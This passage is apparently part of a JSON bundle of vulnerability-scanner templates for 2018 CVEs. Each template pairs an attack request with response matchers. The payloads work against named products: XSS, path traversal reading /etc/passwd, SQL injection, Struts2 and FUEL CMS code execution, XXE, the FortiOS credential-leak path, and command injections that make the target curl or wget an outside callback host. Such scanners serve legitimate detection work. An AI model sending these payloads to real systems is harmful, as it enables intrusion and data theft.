Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12998","info":{"name":"Zoho manageengine - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1207","info":{"name":"Dell iDRAC7/8 Devices - Remote Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login?LD_DEBUG=files"],"matchers":[{"type":"word","part":"response","words":["calling init: /lib/"]}]}]},{"id":"CVE-2018-14931","info":{"name":"Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-12909","info":{"name":"Webgrind <= 1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?op=fileviewer&file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","webgrind"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16283","info":{"name":"WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-1000533","info":{"name":"GitList < 0.6.0 Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /{{path}}/tree/a/search HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nquery=--open-files-in-pager=cat%20/etc/passwd\n"],"matchers":[{"type":"word","part":"body","words":["root:/root:/bin/bash"]}],"extractors":[{"type":"regex","name":"path","group":1,"regex":["<span class=\"name\">(.*?)</span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-10230","info":{"name":"Zend Server <9.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","is not allowed to open debug sessions"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19326","info":{"name":"Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-12300","info":{"name":"Seagate NAS OS 4.3.15.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-12031","info":{"name":"Eaton Intelligent Power Manager 1.6 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd","{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7653","info":{"name":"YzmCMS v3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=search&c=index&a=initxqb4n<img%20src%3da%20onerror%3dalert(document.domain)>cu9rs&modelid=1&q=tes"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>","YzmCMS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12634","info":{"name":"CirCarLife Scada <4.3 - System Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/log"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","words":["user.debug","user.info","EVSE"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7467","info":{"name":"AxxonSoft Axxon Next - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-12095","info":{"name":"OEcms 3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11776","info":{"name":"Apache Struts2 S2-057 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9845","info":{"name":"Etherpad Lite <1.6.4 - Admin Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Etherpad version","Plugin manager","Installed parts"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6910","info":{"name":"DedeCMS 5.7 - Path Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/include/downmix.inc.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["downmix.inc.php","Call to undefined function helper()"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20011","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/category.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes=\n","GET /assets/categories.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-1000129","info":{"name":"Jolokia 1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html","{{BaseURL}}/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg onload=alert(document.domain)>","java.lang.IllegalArgumentException","No type with name"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16763","info":{"name":"FUEL CMS 1.4.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19752","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/registrar.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test\n","GET /assets/registrars.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3760","info":{"name":"Ruby On Rails - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /assets/file:%2f%2f/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"path","regex":["/etc/passwd is no longer under a load path: (.*?),"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-18775","info":{"name":"Microstrategy Web 7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(/{{randstr}}/);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20470","info":{"name":"Tyto Sahi pro 7.x/8.x - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000130","info":{"name":"Jolokia Agent - JNDI Code Injection","severity":"high"},"requests":[{"raw":["POST /jolokia/read/getDiagnosticOptions HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.\nContent-Type: application/x-www-form-urlencoded\n\n{\n   \"type\":\"read\",\n   \"mbean\":\"java.lang:type=Memory\",\n   \"target\":{\n      \"url\":\"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\"\n   }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10736","info":{"name":"NagiosXI <= 5.4.12 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{num}}))%23"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-8823","info":{"name":"PrestaShop Responsive Mega Menu Module - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/bamegamenu/ajax_phpcode.php?code=print(md5({{num}}))"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1271","info":{"name":"Spring MVC Framework - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini","{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7700","info":{"name":"DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["4cc32a3a81d2bb37271934a48ce4468a"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7602","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /?q=user%2Flogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_login&name={{username}}&pass={{password}}&op=Log+in\n","GET /?q={{url_encode(\"{{userid}}\")}}%2Fcancel HTTP/1.1\nHost: {{Hostname}}\n","POST /?q={{url_encode(\"{{userid}}\")}}%2Fcancel&destination={{url_encode(\"{{userid}}\")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account\n","POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_build_id={{form_build_id}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","words":["CVE-2018-7602-POC"]}],"extractors":[{"type":"regex","name":"userid","group":1,"regex":["<meta about=\"([/a-z0-9]+)\" property=\"foaf"],"internal":true,"part":"body"},{"type":"regex","name":"form_token","group":1,"regex":["<input type=\"hidden\" name=\"form_token\" value=\"(.*)\" />"],"internal":true,"part":"body"},{"type":"regex","name":"form_build_id","group":1,"regex":["<input type=\"hidden\" name=\"form_build_id\" value=\"(.*)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-3810","info":{"name":"Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/options-general.php?page=smartcode"],"body":"sgcgoogleanalytic=<script>console.log(\"document.domain\")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<script>console.log(\"document.domain\")</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6605","info":{"name":"Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"id=-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+","matchers-condition":"and","matchers":[{"type":"word","words":["{{md5(num)}}","dataexists"],"part":"body"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20462","info":{"name":"WordPress JSmol2WP <=1.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/jsmol2wp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["JSmol2WP","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3714","info":{"name":"node-srv - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/node_modules/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16668","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/repository"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["** Platform sources **","** Application sources **"],"condition":"and"}]}]},{"id":"CVE-2018-10093","info":{"name":"AudioCodes 420HD - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command.cgi?cat%20/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["admin:.*:*sh$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-13379","info":{"name":"Fortinet FortiOS - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"],"matchers":[{"type":"regex","part":"body","regex":["^var fgt_lang ="]}]}]},{"id":"CVE-2018-17431","info":{"name":"Comodo Unified Threat Management Web Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n","GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Configuration has been altered"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8715","info":{"name":"AppWeb - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Digest username=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a class=\"logo\" href=\"https://embedthis.com/\">&nbsp;</a>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18809","info":{"name":"TIBCO JasperReports Library - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["metadata.jdbc.driverClassName","metadata.hibernate.dialect"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11709","info":{"name":"WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14728","info":{"name":"Responsive filemanager 9.13.1 Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/filemanager/upload.php"],"body":"fldr=&url=file:///etc/passwd","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-3167","info":{"name":"Oracle E-Business Suite - Blind SSRF","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/OA_HTML/lcmServiceController.jsp"],"body":"<!DOCTYPE root PUBLIC \"-//B/A/EN\" \"http://interact.sh\">","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unexpected text in DTD"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20824","info":{"name":"Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)timeout:\\salert\\(document\\.domain\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6530","info":{"name":"D-Link - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /soap.cgi?service=whatever-control;curl {{interactsh-url}};whatever-invalid-shell HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nSOAPAction: \"whatever-serviceType#whatever-action\"\nContent-Type: text/xml\n\nwhatever-content\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2018-1335","info":{"name":"Apache Tika <1.1.8-  Header Command Injection","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/meta"],"body":"var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");","headers":{"X-Tika-OCRTesseractPath":"cscript","X-Tika-OCRLanguage":"//E:Jscript","Expect":"100-continue","Content-type":"image/jp2","Connection":"close"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: text/csv"]},{"type":"word","part":"body","words":["org.apache.tika.parser.DefaultParser","org.apache.tika.parser.gdal.GDALParse"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15917","info":{"name":"Jorani Leave Management System 0.6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1\nHost: {{Hostname}}\n","GET /session/login HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","_jorani"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5230","info":{"name":"Atlassian Jira Confluence - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<iframe src=\"javascript:alert(document.domain)\">","confluence"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17254","info":{"name":"Joomla! JCK Editor SQL Injection","severity":"critical"},"requests":[{"raw":["GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5({{num}})),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-6008","info":{"name":"Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16167","info":{"name":"LogonTracer <=1.2.0 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-8770","info":{"name":"Cobub Razor 0.8.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tests/generate.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Fatal error: Class 'PHPUnit_Framework_TestCase' not found in ","/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19439","info":{"name":"Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html"],"matchers":[{"type":"word","part":"body","words":["<script>alert(1337)</script><!--</TITLE>"]}]}]},{"id":"CVE-2018-6200","info":{"name":"vBulletin - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirector.php?url=https://interact.sh","{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<meta http-equiv=\"refresh\" content=\"0; URL=https://interact.sh\">"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16288","info":{"name":"LG SuperSign EZ CMS 2.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16979","info":{"name":"Monstra CMS 3.0.4 - HTTP Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["new line detected in","cryptographp.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8033","info":{"name":"Apache OFBiz 16.11.04 - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY disclose SYSTEM \"file://///etc/passwd\">]><methodCall><methodName>&disclose;</methodName></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-13380","info":{"name":"Fortinet FortiOS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B","{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1337)>","<script>alert(1337)</script>"],"condition":"or"},{"type":"word","part":"header","negative":true,"words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11227","info":{"name":"Monstra CMS <=3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST 